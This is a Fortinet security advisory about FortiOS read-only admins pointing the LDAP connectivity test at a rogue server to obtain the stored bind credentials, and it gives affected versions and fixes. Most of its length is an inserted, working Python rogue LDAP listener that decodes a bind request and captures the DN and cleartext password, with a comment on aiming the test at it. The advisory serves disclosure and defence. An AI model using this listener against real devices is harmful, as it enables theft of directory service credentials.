PSIRT Advisory

Read-only admins can obtain LDAP credentials configured in FortiGate using the LDAP test connectivity feature


Summary

A FortiGate administrator whose profile is read-only can direct the LDAP server connectivity test at a rogue LDAP server of their choosing instead of the configured one. The test binds to the target with the bind DN and password stored in the FortiGate's LDAP server configuration, so the rogue server receives those credentials, allowing a read-only admin to obtain the LDAP login credentials configured on the FortiGate.
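To make the exposure concrete, the following is an added example (not Fortinet code and not part of this advisory): a minimal rogue LDAP listener that decodes the simple BindRequest a client sends and returns the DN and password it carries. The sample message, service account DN and password are constructed for illustration; the BER handling is written by hand from RFC 4511 so nothing here needs an LDAP library or network access to run.

```python
"""
Added example (not Fortinet code): a minimal rogue LDAP listener showing what an
LDAP connectivity test hands to whatever server it is pointed at. A simple bind
carries the bind DN and password in the clear inside the BindRequest; an
attacker-controlled server only has to decode the message to read both.
All BER encoding/decoding is hand-written from RFC 4511 so this runs offline.
"""
import socket
from typing import Optional

# LDAP/BER tags used by a bind exchange (RFC 4511, section 4.2)
SEQUENCE, INTEGER, OCTET_STRING, ENUMERATED = 0x30, 0x02, 0x04, 0x0A
BIND_REQUEST = 0x60    # [APPLICATION 0] constructed
BIND_RESPONSE = 0x61   # [APPLICATION 1] constructed
SIMPLE_AUTH = 0x80     # authentication CHOICE: simple [0] OCTET STRING


def ber_len(n: int) -> bytes:
    """Encode a BER length: short form below 128, long form otherwise."""
    if n < 0x80:
        return bytes([n])
    body = n.to_bytes((n.bit_length() + 7) // 8, "big")
    return bytes([0x80 | len(body)]) + body


def ber_tlv(tag: int, body: bytes) -> bytes:
    return bytes([tag]) + ber_len(len(body)) + body


def ber_int(value: int) -> bytes:
    nbytes = max(1, (value.bit_length() + 8) // 8)  # keeps the sign bit clear for positives
    return ber_tlv(INTEGER, value.to_bytes(nbytes, "big", signed=True))


def read_tlv(buf: bytes, pos: int):
    """Return (tag, value, position after the element), checking bounds as it goes."""
    if pos + 2 > len(buf):
        raise ValueError("truncated BER element")
    tag, first = buf[pos], buf[pos + 1]
    pos += 2
    if first & 0x80:                       # long-form length
        n = first & 0x7F
        length = int.from_bytes(buf[pos:pos + n], "big")
        pos += n
    else:
        length = first
    if pos + length > len(buf):
        raise ValueError("BER length exceeds buffer")
    return tag, buf[pos:pos + length], pos + length


def build_bind_request(msg_id: int, dn: str, password: str) -> bytes:
    """Encode what an LDAP client sends for a simple bind (used here to build the sample)."""
    op = ber_tlv(BIND_REQUEST, ber_int(3) + ber_tlv(OCTET_STRING, dn.encode())
                 + ber_tlv(SIMPLE_AUTH, password.encode()))
    return ber_tlv(SEQUENCE, ber_int(msg_id) + op)


def build_bind_response(msg_id: int, result_code: int = 0) -> bytes:
    """Encode a BindResponse; resultCode 0 (success) makes the caller's test report OK."""
    op = ber_tlv(BIND_RESPONSE, ber_tlv(ENUMERATED, bytes([result_code]))
                 + ber_tlv(OCTET_STRING, b"") + ber_tlv(OCTET_STRING, b""))
    return ber_tlv(SEQUENCE, ber_int(msg_id) + op)


def parse_bind_request(data: bytes) -> Optional[dict]:
    """Decode an LDAPMessage; return DN and password for a simple BindRequest, else None."""
    tag, msg, _ = read_tlv(data, 0)
    if tag != SEQUENCE:
        raise ValueError("not an LDAPMessage")
    tag, mid, pos = read_tlv(msg, 0)
    if tag != INTEGER:
        raise ValueError("missing messageID")
    msg_id = int.from_bytes(mid, "big", signed=True)
    tag, op, _ = read_tlv(msg, pos)
    if tag != BIND_REQUEST:
        return None                        # some other operation; nothing to capture
    _, version, pos = read_tlv(op, 0)
    _, name, pos = read_tlv(op, pos)
    auth_tag, auth, _ = read_tlv(op, pos)
    creds = {"message_id": msg_id, "version": int.from_bytes(version, "big"),
             "dn": name.decode("utf-8", "replace"), "password": None}
    if auth_tag == SIMPLE_AUTH:            # simple bind: the password is sent in the clear
        creds["password"] = auth.decode("utf-8", "replace")
    return creds


def capture_bind(host: str = "0.0.0.0", port: int = 389) -> Optional[dict]:
    """Accept one connection, decode its BindRequest, answer 'success', return the creds."""
    with socket.socket() as srv:
        srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        srv.bind((host, port))
        srv.listen(1)
        conn, _peer = srv.accept()
        with conn:
            data = conn.recv(4096)         # a BindRequest fits comfortably in one segment
            creds = parse_bind_request(data)
            if creds is not None:
                conn.sendall(build_bind_response(creds["message_id"]))
            return creds


# Constructed sample (hypothetical service account): the bind a client would send if its
# LDAP server entry held these credentials and the connectivity test were pointed here.
SAMPLE_BIND_REQUEST = build_bind_request(
    1, "cn=fortigate-svc,ou=service,dc=example,dc=com", "S3cretBindPw!")

if __name__ == "__main__":
    print(parse_bind_request(SAMPLE_BIND_REQUEST))
    # To observe a live test: run capture_bind(port=1389) on a host you control and aim
    # the connectivity test at it; the printed dict is everything the rogue server learns.
```

Pointing the test at LDAPS rather than plain LDAP does not help here: the rogue server terminates the TLS session itself and still sees the cleartext bind. The defence is on the FortiGate side (the fixed releases listed below restrict who may run the test).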


Impact

Improper Access Control

Affected Products

FortiOS 6.0.0 to 6.0.2

FortiOS 5.6.7 and earlier


Solutions

Upgrade to FortiOS 5.6.8, FortiOS 6.0.3 or the upcoming FortiOS 6.2.0.

Because the flaw discloses the stored LDAP bind credentials to anyone who held a read-only admin account on an affected release, treat that LDAP account password as potentially exposed and change it after upgrading.


Acknowledgement

Fortinet is pleased to thank Julio Engels Ureña Martinez for reporting this vulnerability under responsible disclosure.